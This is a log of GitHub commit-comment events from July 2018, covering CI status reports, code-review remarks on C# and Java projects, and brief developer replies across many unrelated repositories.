{"id":"7982745014","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29749188,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-18T12:52:17Z","updated_at":"2018-07-18T12:52:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T12:52:17Z"}
{"id":"7982745476","type":"CommitCommentEvent","actor":{"login":"marcusvb"},"repo":{"name":"rkalis/dotfiles"},"payload":{"comment":{"id":29749189,"position":null,"line":null,"path":null,"commit_id":"80e8ba0421cf8268779b547957f57b595e993efc","created_at":"2018-07-18T12:52:22Z","updated_at":"2018-07-18T12:52:22Z","author_association":"NONE","body":"🎉🎉🎉🎉🎉🎉🎉"}},"created_at":"2018-07-18T12:52:22Z"}
{"id":"7982745979","type":"CommitCommentEvent","actor":{"login":"vstrimaitis"},"repo":{"name":"gerdasml/dejavu-online-shop"},"payload":{"comment":{"id":29749190,"position":null,"line":null,"path":null,"commit_id":"11c1f29c7fa423e13d2f0bc6ae50531e6d553406","created_at":"2018-07-18T12:52:28Z","updated_at":"2018-07-18T12:52:28Z","author_association":"COLLABORATOR","body":":+1:"}},"created_at":"2018-07-18T12:52:28Z"}
{"id":"7982752724","type":"CommitCommentEvent","actor":{"login":"jamescarlo"},"repo":{"name":"jamescarlo/FxProjects"},"payload":{"comment":{"id":29749204,"position":null,"line":null,"path":null,"commit_id":"7958c472555ed3322e31ef5f51fda4dedfc2511d","created_at":"2018-07-18T12:53:39Z","updated_at":"2018-07-18T12:53:39Z","author_association":"OWNER","body":"I dont know what im Doing Please Help !\r\n"}},"created_at":"2018-07-18T12:53:39Z"}
{"id":"7982755415","type":"CommitCommentEvent","actor":{"login":"tunia77"},"repo":{"name":"tunia77/TestPlan"},"payload":{"comment":{"id":29749214,"position":6,"line":15,"path":"Setup ThreadGroup2.jmx","commit_id":"b90efc468a481cb5b6ac6e571df13b638d3db811","created_at":"2018-07-18T12:54:11Z","updated_at":"2018-07-18T12:54:11Z","author_association":"OWNER","body":"vffdvf"}},"created_at":"2018-07-18T12:54:11Z"}
{"id":"7982756073","type":"CommitCommentEvent","actor":{"login":"mahinator"},"repo":{"name":"3DI70R/Summer-Saliens-Bot"},"payload":{"comment":{"id":29749215,"position":null,"line":null,"path":null,"commit_id":"4f7d35b9f90779d097923d9e3d732df81827233e","created_at":"2018-07-18T12:54:19Z","updated_at":"2018-07-18T12:54:19Z","author_association":"NONE","body":"what a cheater"}},"created_at":"2018-07-18T12:54:19Z"}
{"id":"7982756418","type":"CommitCommentEvent","actor":{"login":"tuxedo0801"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29749218,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-18T12:54:22Z","updated_at":"2018-07-18T12:54:22Z","author_association":"NONE","body":"more future proof would be the multi-release attempt, I guess.\r\n\r\nBut reflection would be faster.\r\n\r\nMy firsthacking attempt for java8 + >=9:\r\n\r\n```java\r\n  private void unmapFile() {\r\n    if (byteBuffer != null) {\r\n      if (byteBuffer.isDirect()) {\r\n\r\n        try {\r\n          // java=8\r\n          Method cleanerMethod = byteBuffer.getClass().getMethod(\"cleaner\");\r\n          cleanerMethod.setAccessible(true);\r\n          Object cleaner = cleanerMethod.invoke(byteBuffer);\r\n          Method cleanMethod = cleaner.getClass().getMethod(\"clean\");\r\n          cleanMethod.setAccessible(true);\r\n          cleanMethod.invoke(cleaner);\r\n        } catch (Exception ex) {\r\n          // java 8 solution not possible\r\n\r\n          try {\r\n            // try java>=9\r\n            Method method = unsafe.getClass().getMethod(\"invokeCleaner\", ByteBuffer.class);\r\n            method.invoke(unsafe, byteBuffer);\r\n\r\n          } catch (Exception ex1) {\r\n            System.err.println(\"Error cleaning up directbuffer natively: \" + ex1.getMessage());\r\n          }\r\n```\r\n\r\n--> heavily untested ... but compiles fine for java8, 9 and 10."}},"created_at":"2018-07-18T12:54:22Z"}
{"id":"7982763705","type":"CommitCommentEvent","actor":{"login":"grs"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29749230,"position":10,"line":342,"path":"README.md","commit_id":"552d7f7af83dc2889cc0391104e1f4fb5ea77bfa","created_at":"2018-07-18T12:55:40Z","updated_at":"2018-07-18T12:55:40Z","author_association":"MEMBER","body":"The context.sender.error, context.receiver.error. context.session.error and context.connection.error properties provide access to the amqp error information (as specified in the amqp spec). The 'consistent pattern' you describe is unaltered and can be relied on still.\r\n\r\nOn connection_error events, the error will also be available as an 'error' property on the context of type Error (or subclass, at present ConnectionError). This will generally have the same information as the context.connection.error object but they are of different types. However an error with SASL will be available through context.error, but not through context.connection.error (as the amqp connection was never established).\r\n\r\nOn disconnected events the context will have an error property that will be of type Error (or some subclass) as emitted by the underlying socket. (The disconnected and connection_error are similar in this regard, and differ only in the types of error they are used to convey). \r\n\r\nThe session_, sender_ and receiver_ error events do not have an 'error' property on the context."}},"created_at":"2018-07-18T12:55:40Z"}
{"id":"7982764187","type":"CommitCommentEvent","actor":{"login":"mirkocoppola80"},"repo":{"name":"mirkocoppola80/biancalani"},"payload":{"comment":{"id":29749233,"position":null,"line":null,"path":null,"commit_id":"e102ccad99719ccaf37973179dbe8be8f95eef38","created_at":"2018-07-18T12:55:45Z","updated_at":"2018-07-18T12:55:45Z","author_association":"OWNER","body":"First"}},"created_at":"2018-07-18T12:55:45Z"}
{"id":"7982768228","type":"CommitCommentEvent","actor":{"login":"knstvk"},"repo":{"name":"cuba-platform/documentation"},"payload":{"comment":{"id":29749241,"position":9,"line":1122,"path":"content/manual/adoc/ru/middleware.adoc","commit_id":"94ee62d24431ae5f642879659e61de69396ce127","created_at":"2018-07-18T12:56:29Z","updated_at":"2018-07-18T12:56:29Z","author_association":"MEMBER","body":"Мне кажется надо либо \"всегда рекомендуется увеличивать\" либо просто \"рекомендуется увеличить\"."}},"created_at":"2018-07-18T12:56:29Z"}
{"id":"7982768502","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29749242,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-18T12:56:32Z","updated_at":"2018-07-18T12:56:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T12:56:32Z"}
{"id":"7982783387","type":"CommitCommentEvent","actor":{"login":"sanjay2916"},"repo":{"name":"sanjay2916/test"},"payload":{"comment":{"id":29749269,"position":1,"line":1,"path":"Dockerfile","commit_id":"7a1ff732b7dad63bc9c868862d1fca7812dea183","created_at":"2018-07-18T12:59:09Z","updated_at":"2018-07-18T12:59:09Z","author_association":"OWNER","body":"changes"}},"created_at":"2018-07-18T12:59:09Z"}
{"id":"7982786447","type":"CommitCommentEvent","actor":{"login":"MarkPhillips"},"repo":{"name":"loedeman/AutoMapper"},"payload":{"comment":{"id":29749275,"position":null,"line":null,"path":null,"commit_id":"fe1cc072391808e9e167d9e013c7a0033994b005","created_at":"2018-07-18T12:59:37Z","updated_at":"2018-07-18T12:59:37Z","author_association":"NONE","body":"Need more documentation besides tests"}},"created_at":"2018-07-18T12:59:37Z"}
{"id":"7982806065","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29749329,"position":175,"line":175,"path":"NET.S.2018.Shaveko.09/JaggedArrayExtension.Tests/JaggedArrayExtencionTests.cs","commit_id":"c2339aaf7f47094f799a636aa7d70bb43a64a7d8","created_at":"2018-07-18T13:03:02Z","updated_at":"2018-07-18T13:03:02Z","author_association":"NONE","body":"нет тестов с null-ами"}},"created_at":"2018-07-18T13:03:02Z"}
{"id":"7982807945","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29749334,"position":null,"line":null,"path":null,"commit_id":"2461c11c780e75b83c332025951855a7cd2dfd65","created_at":"2018-07-18T13:03:23Z","updated_at":"2018-07-18T13:03:23Z","author_association":"NONE","body":"@mrobaczyk \r\nThe retest makes no sense because it failed fast. A [0,4] test makes here no difference. Also retesting failed patches is not recommended because their is some probably for a false positive for each test (else you repeat the test if it randomly passes) and so dilutes the chosen error level (alpha=beta=5%) of SPRT."}},"created_at":"2018-07-18T13:03:23Z"}
{"id":"7982809278","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29749336,"position":13,"line":13,"path":"NET.S.2018.Shaveko.09/JaggedArrayExtencion/ICompare.cs","commit_id":"c2339aaf7f47094f799a636aa7d70bb43a64a7d8","created_at":"2018-07-18T13:03:37Z","updated_at":"2018-07-18T13:03:37Z","author_association":"NONE","body":"IComparer"}},"created_at":"2018-07-18T13:03:37Z"}
{"id":"7982809533","type":"CommitCommentEvent","actor":{"login":"garymccusker"},"repo":{"name":"garymccusker/berassessors"},"payload":{"comment":{"id":29749337,"position":null,"line":null,"path":null,"commit_id":"76fc1b21e1dc82087ccb2e9149c038ccfce4d42f","created_at":"2018-07-18T13:03:40Z","updated_at":"2018-07-18T13:03:40Z","author_association":"OWNER","body":"Incorporate Glen's idea on complexity"}},"created_at":"2018-07-18T13:03:40Z"}
{"id":"7982812928","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29749344,"position":38,"line":38,"path":"NET.S.2018.Shaveko.09/JaggedArrayExtencion/JaggedArrayExtencion.cs","commit_id":"c2339aaf7f47094f799a636aa7d70bb43a64a7d8","created_at":"2018-07-18T13:04:16Z","updated_at":"2018-07-18T13:04:16Z","author_association":"NONE","body":"не рациональная версия сортировка- внешний цикл"}},"created_at":"2018-07-18T13:04:16Z"}
{"id":"7982813115","type":"CommitCommentEvent","actor":{"login":"ClementLouis"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29749345,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-18T13:04:17Z","updated_at":"2018-07-18T13:04:17Z","author_association":"NONE","body":"\"I haven't seen a single card, either OCG/TCG or Anime/Manga with an effect like this.\"\r\nIt don't mean that it will never be done one day\r\nif we can futur proofing a bit by not merging functions while making the whole thing also easier to read at the same time\r\nSometime There is a need to think a bit further than \"card X need it now\"\r\neasy exemple, when Pendulum Fusion was showed, I recall eerie mention that a similar card for synchro/Xyz will be done sooner or later, but nothing was done at that time, and it happened, Performapal Odd-Eyes Synchron was released a few month after"}},"created_at":"2018-07-18T13:04:17Z"}
{"id":"7982817182","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29749356,"position":60,"line":60,"path":"NET.S.2018.Shaveko.09/JaggedArrayExtencion/JaggedArrayExtencion.cs","commit_id":"c2339aaf7f47094f799a636aa7d70bb43a64a7d8","created_at":"2018-07-18T13:05:00Z","updated_at":"2018-07-18T13:05:00Z","author_association":"NONE","body":"этот и остальные функции-ключи переместить в тестовый проект"}},"created_at":"2018-07-18T13:05:00Z"}
{"id":"7982830461","type":"CommitCommentEvent","actor":{"login":"satmandu"},"repo":{"name":"MihailJP/Sheeghra"},"payload":{"comment":{"id":29749383,"position":null,"line":null,"path":null,"commit_id":"b3807feefdd19d035575d424e7244e2c8f3cf05c","created_at":"2018-07-18T13:07:13Z","updated_at":"2018-07-18T13:07:13Z","author_association":"NONE","body":"Thank you so much!"}},"created_at":"2018-07-18T13:07:13Z"}
{"id":"7982830469","type":"CommitCommentEvent","actor":{"login":"DanaMW"},"repo":{"name":"DanaMW/Download-Synthesis-Aria2"},"payload":{"comment":{"id":29749384,"position":3,"line":3,"path":"_locales/en/messages.json","commit_id":"031852d40e5409c92907f6aa8e258c74d4b0bc89","created_at":"2018-07-18T13:07:14Z","updated_at":"2018-07-18T13:07:14Z","author_association":"OWNER","body":"revert\r\n"}},"created_at":"2018-07-18T13:07:14Z"}
{"id":"7982831882","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29749387,"position":6,"line":5,"path":"api/db.json","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T13:07:29Z","updated_at":"2018-07-18T13:07:29Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-18T13:07:29Z"}
{"id":"7982832780","type":"CommitCommentEvent","actor":{"login":"AustinFengYi"},"repo":{"name":"jealic/stackflow"},"payload":{"comment":{"id":29749390,"position":null,"line":null,"path":null,"commit_id":"e7c52a017567e5be8d31cb4077592ea27a122519","created_at":"2018-07-18T13:07:38Z","updated_at":"2018-07-18T13:07:38Z","author_association":"COLLABORATOR","body":"2018-07-18 21:04 這次PR完成了\r\n 1.add columns in user table,including\r\n    角色 :role, :string\r\n    姓名:name, :string\r\n    公司, :company, :string\r\n    職稱 :position, :string\r\n    簡介 :introduction, :text\r\n    個人網站 :website, :string\r\n    推特 :twitter, :string\r\n    github :github, :string\r\n    照片 :image, :string"}},"created_at":"2018-07-18T13:07:38Z"}
{"id":"7982832951","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29749391,"position":12,"line":31,"path":"src/action/index.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T13:07:40Z","updated_at":"2018-07-18T13:07:40Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-18T13:07:40Z"}
{"id":"7982833401","type":"CommitCommentEvent","actor":{"login":"DanaMW"},"repo":{"name":"DanaMW/Download-Synthesis-Aria2"},"payload":{"comment":{"id":29749392,"position":12,"line":18,"path":"_locales/en/messages.json","commit_id":"031852d40e5409c92907f6aa8e258c74d4b0bc89","created_at":"2018-07-18T13:07:44Z","updated_at":"2018-07-18T13:07:44Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-18T13:07:44Z"}
{"id":"7982834276","type":"CommitCommentEvent","actor":{"login":"arnabmn"},"repo":{"name":"arnabmn/Krakow-Taxi-Claims"},"payload":{"comment":{"id":29749395,"position":null,"line":null,"path":null,"commit_id":"bd79fbf8c10ec199c8f1865ec9e75b98859fc937","created_at":"2018-07-18T13:07:52Z","updated_at":"2018-07-18T13:07:52Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4e3c4bad-7510-4386-9d19-8321591c4f07?env_id=ibm%3Ayp%3Aeu-gb \"Global-Weather\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/ec0e2f49-7e5c-4e10-9329-585efae5cf5b?env_id=ibm%3Ayp%3Aeu-gb \"Krakow-Taxi-Claims\") deployed [Krakow-Taxi-Claims](https://github.com/arnabmn/Krakow-Taxi-Claims/releases/tag/deploy-ibm-yp-eu-gb-CF1_ARNABHAT-PROD-20180718-130750 \"deploy-ibm-yp-eu-gb-CF1_ARNABHAT-PROD-20180718-130750\") to [PROD](https://console.bluemix.net/apps/8d69031e-85b9-4f91-849e-d91e7262f26a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:CF1_ARNABHAT:PROD\"), including this commit"}},"created_at":"2018-07-18T13:07:52Z"}
{"id":"7982835495","type":"CommitCommentEvent","actor":{"login":"DanaMW"},"repo":{"name":"DanaMW/Download-Synthesis-Aria2"},"payload":{"comment":{"id":29749398,"position":21,"line":328,"path":"_locales/en/messages.json","commit_id":"031852d40e5409c92907f6aa8e258c74d4b0bc89","created_at":"2018-07-18T13:08:05Z","updated_at":"2018-07-18T13:08:05Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-18T13:08:05Z"}
{"id":"7982836421","type":"CommitCommentEvent","actor":{"login":"chambox"},"repo":{"name":"chambox/chambox.github.io"},"payload":{"comment":{"id":29749400,"position":null,"line":null,"path":null,"commit_id":"5e3182fd31cec6a276a521fd52506d88798f6727","created_at":"2018-07-18T13:08:15Z","updated_at":"2018-07-18T13:08:15Z","author_association":"OWNER","body":"I am reverting all commits"}},"created_at":"2018-07-18T13:08:15Z"}
{"id":"7982837653","type":"CommitCommentEvent","actor":{"login":"badalipe"},"repo":{"name":"felipenaselva/felipe.repository"},"payload":{"comment":{"id":29749401,"position":null,"line":null,"path":null,"commit_id":"970a210d2924159be00822b19f1602bf0a663eb4","created_at":"2018-07-18T13:08:26Z","updated_at":"2018-07-18T13:08:26Z","author_association":"NONE","body":"Olá Felipenaselva.\r\nVc poderia envia pro meu e-mail o addon Netcine - Cube - Point242 modificado com somente menu de filmes.\r\nSe não der pra fazer em todos pelo menos em um addon citado acima.\r\nPagaria ate pelo serviço.\r\nAbç amigo. Meu e-mail é badalipe@gmail.com\r\n\r\nAtt"}},"created_at":"2018-07-18T13:08:26Z"}
{"id":"7982838086","type":"CommitCommentEvent","actor":{"login":"DanaMW"},"repo":{"name":"DanaMW/Download-Synthesis-Aria2"},"payload":{"comment":{"id":29749402,"position":44,"line":409,"path":"_locales/en/messages.json","commit_id":"031852d40e5409c92907f6aa8e258c74d4b0bc89","created_at":"2018-07-18T13:08:31Z","updated_at":"2018-07-18T13:08:31Z","author_association":"OWNER","body":"revert\r\n"}},"created_at":"2018-07-18T13:08:31Z"}
{"id":"7982845695","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29749414,"position":12,"line":79,"path":"src/containers/VisiblePostList.js","commit_id":"23240fe00bfec9bf59e0811f67cc4aa7e0b8ee17","created_at":"2018-07-18T13:09:51Z","updated_at":"2018-07-18T13:09:51Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-18T13:09:51Z"}
{"id":"7982856242","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29749432,"position":null,"line":null,"path":null,"commit_id":"2461c11c780e75b83c332025951855a7cd2dfd65","created_at":"2018-07-18T13:11:55Z","updated_at":"2018-07-18T13:11:55Z","author_association":"OWNER","body":"@locutus2 \r\nOk no problem. So because test failed so fast... it means that tuned parameters are sensitive to time control. It's very hard to pass 10+0.1 and then 60+0.6 when tuning with 20+0.2. How can I proceed with the experiments? Can I run new tuning with different TC or should I stick to 20+0.2 but change the model of mobility modifier?\r\n\r\nThanks for help"}},"created_at":"2018-07-18T13:11:55Z"}
{"id":"7982858422","type":"CommitCommentEvent","actor":{"login":"altereg0"},"repo":{"name":"altereg0/3EQ4MRKk"},"payload":{"comment":{"id":29749444,"position":null,"line":null,"path":null,"commit_id":"a16e07de2fa2d80f1fe553ac0b9c3e1ce6fcc571","created_at":"2018-07-18T13:12:23Z","updated_at":"2018-07-18T13:12:23Z","author_association":"OWNER","body":"Херню спорол"}},"created_at":"2018-07-18T13:12:23Z"}
{"id":"7982859152","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-CSharp"},"payload":{"comment":{"id":29749448,"position":51,"line":51,"path":"NET.S.2018.YACHNIK.09/ArrangedArray/ArrangedArray.cs","commit_id":"58a4c63ce9e23dd6a59fa0293ea0ad947863de01","created_at":"2018-07-18T13:12:33Z","updated_at":"2018-07-18T13:12:33Z","author_association":"NONE","body":"классы-ключи убрать отсюда в тестовый проект"}},"created_at":"2018-07-18T13:12:33Z"}
{"id":"7982862262","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-CSharp"},"payload":{"comment":{"id":29749454,"position":14,"line":14,"path":"NET.S.2018.YACHNIK.09/ArrangedArray/Compare.cs","commit_id":"58a4c63ce9e23dd6a59fa0293ea0ad947863de01","created_at":"2018-07-18T13:13:07Z","updated_at":"2018-07-18T13:13:07Z","author_association":"NONE","body":"IComparer!"}},"created_at":"2018-07-18T13:13:07Z"}
{"id":"7982863996","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-CSharp"},"payload":{"comment":{"id":29749462,"position":169,"line":169,"path":"NET.S.2018.YACHNIK.09/ArrangedArray/ArrangedArrayTests.cs","commit_id":"58a4c63ce9e23dd6a59fa0293ea0ad947863de01","created_at":"2018-07-18T13:13:22Z","updated_at":"2018-07-18T13:13:22Z","author_association":"NONE","body":"нет тестов с null-ами"}},"created_at":"2018-07-18T13:13:22Z"}
{"id":"7982866141","type":"CommitCommentEvent","actor":{"login":"hzd02765"},"repo":{"name":"hzd02765/nyusatsu_check_cron"},"payload":{"comment":{"id":29749466,"position":10,"line":6,"path":"util.py","commit_id":"7fb45d9d3afc5ce22ccb4b07df291247d63d75d4","created_at":"2018-07-18T13:13:37Z","updated_at":"2018-07-18T13:13:37Z","author_association":"OWNER","body":"あいう"}},"created_at":"2018-07-18T13:13:37Z"}
{"id":"7982869960","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29749472,"position":10,"line":342,"path":"README.md","commit_id":"552d7f7af83dc2889cc0391104e1f4fb5ea77bfa","created_at":"2018-07-18T13:14:01Z","updated_at":"2018-07-18T13:14:01Z","author_association":"COLLABORATOR","body":"I see. This is very valuable information and must be documented in the README. It is very easy to get lost while handling errors. I will also add this in the documentation for type definitions of `EventContext`. vscode displays all the source code docs in intellisense, which makes it easy to comprehend things."}},"created_at":"2018-07-18T13:14:01Z"}
{"id":"7982870037","type":"CommitCommentEvent","actor":{"login":"luckybawa"},"repo":{"name":"aspnet/RoslynCodeDomProvider"},"payload":{"comment":{"id":29749473,"position":4,"line":22,"path":"tools/RoslynCodeProvider.settings.targets","commit_id":"1f4a542d407c4fb6ce504aaa63418044d52c6717","created_at":"2018-07-18T13:14:02Z","updated_at":"2018-07-18T13:14:02Z","author_association":"NONE","body":"hh\r\n"}},"created_at":"2018-07-18T13:14:02Z"}
{"id":"7982875669","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/catboost-feedstock"},"payload":{"comment":{"id":29749489,"position":null,"line":null,"path":null,"commit_id":"fe8b413eca56f453453562b18644466b3fe39484","created_at":"2018-07-18T13:14:52Z","updated_at":"2018-07-18T13:14:52Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nikitxskv, @kizill were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @nikitxskv, @kizill were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-18T13:14:52Z"}
{"id":"7982875680","type":"CommitCommentEvent","actor":{"login":"kof"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29749490,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-18T13:14:52Z","updated_at":"2018-07-18T13:14:52Z","author_association":"NONE","body":"should we fix it in v10? Export all the types?"}},"created_at":"2018-07-18T13:14:52Z"}
{"id":"7982878379","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.09"},"payload":{"comment":{"id":29749499,"position":10,"line":11,"path":"SortingAlgorithms/SortJaggedArray.cs","commit_id":"1b3b9c884a955f6bef22bb7a2ff86b357d1f3fe3","created_at":"2018-07-18T13:15:19Z","updated_at":"2018-07-18T13:15:19Z","author_association":"NONE","body":"интерфейс в отдельный файл добавляется, нужно \"вынуть\" из класса"}},"created_at":"2018-07-18T13:15:19Z"}
{"id":"7982879461","type":"CommitCommentEvent","actor":{"login":"MatteoLombardi"},"repo":{"name":"MatteoLombardi/angular6WIP"},"payload":{"comment":{"id":29749502,"position":15,"line":14,"path":"src/app/app.component.ts","commit_id":"f0e57877d0602e1ec22e95917c579356b9391acd","created_at":"2018-07-18T13:15:30Z","updated_at":"2018-07-18T13:15:30Z","author_association":"OWNER","body":"array di colori generati random"}},"created_at":"2018-07-18T13:15:30Z"}
{"id":"7982884001","type":"CommitCommentEvent","actor":{"login":"HenriBeck"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29749510,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-18T13:16:14Z","updated_at":"2018-07-18T13:16:14Z","author_association":"NONE","body":"Yeah, it will also make it easier to type plugins if necessary."}},"created_at":"2018-07-18T13:16:14Z"}
{"id":"7982884399","type":"CommitCommentEvent","actor":{"login":"qsm-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29749511,"position":null,"line":null,"path":null,"commit_id":"da150e591dd4e08eae12398c6f4502bc17042fba","created_at":"2018-07-18T13:16:18Z","updated_at":"2018-07-18T13:16:18Z","author_association":"CONTRIBUTOR","body":"For info: was fixed with https://github.com/odoo/odoo/commit/c8c5bc2c1b63dadf381f94b25b652e1057be18ec in 11.0 but was not forward-ported yet :wink: "}},"created_at":"2018-07-18T13:16:18Z"}
{"id":"7982885052","type":"CommitCommentEvent","actor":{"login":"GeoffreyMetais"},"repo":{"name":"kazemihabib/vlc-android"},"payload":{"comment":{"id":29749512,"position":31,"line":31,"path":"vlc-android/src/org/videolan/vlc/repository/ExternalSubRepository.kt","commit_id":"cb2d49463f65800b5764c79df98099d9e0e0eb3b","created_at":"2018-07-18T13:16:25Z","updated_at":"2018-07-18T13:16:25Z","author_association":"CONTRIBUTOR","body":"you probably can pass DB and dao in constructor arguments:\r\n`class ExternalSubRepository (context: Context,\r\nval mediaDatabase : MediaDatabase =MediaDatabase.getDatabase(context),\r\nval  externalSubDao :  ExternalSubDao  = mediaDatabase.externalSubDao())"}},"created_at":"2018-07-18T13:16:25Z"}
{"id":"7982886458","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29749513,"position":null,"line":null,"path":null,"commit_id":"165c8353e9496ca21dbf8ff563b96030d1492967","created_at":"2018-07-18T13:16:35Z","updated_at":"2018-07-18T13:16:35Z","author_association":"COLLABORATOR","body":"\\o/\r\n"}},"created_at":"2018-07-18T13:16:35Z"}
{"id":"7982887811","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.09"},"payload":{"comment":{"id":29749514,"position":23,"line":33,"path":"SortingAlgorithms/SortJaggedArray.cs","commit_id":"1b3b9c884a955f6bef22bb7a2ff86b357d1f3fe3","created_at":"2018-07-18T13:16:46Z","updated_at":"2018-07-18T13:16:46Z","author_association":"NONE","body":"и опять при сортировке \"скатились\" к возврату массива из функции ((("}},"created_at":"2018-07-18T13:16:46Z"}
{"id":"7982888049","type":"CommitCommentEvent","actor":{"login":"edannenberg"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29749515,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-18T13:16:48Z","updated_at":"2018-07-18T13:16:48Z","author_association":"CONTRIBUTOR","body":"So basically you don't care that pretty much all other maintainers made an effort to improve git discipline over the course of this year, because you prefer easy over proper?\r\n"}},"created_at":"2018-07-18T13:16:48Z"}
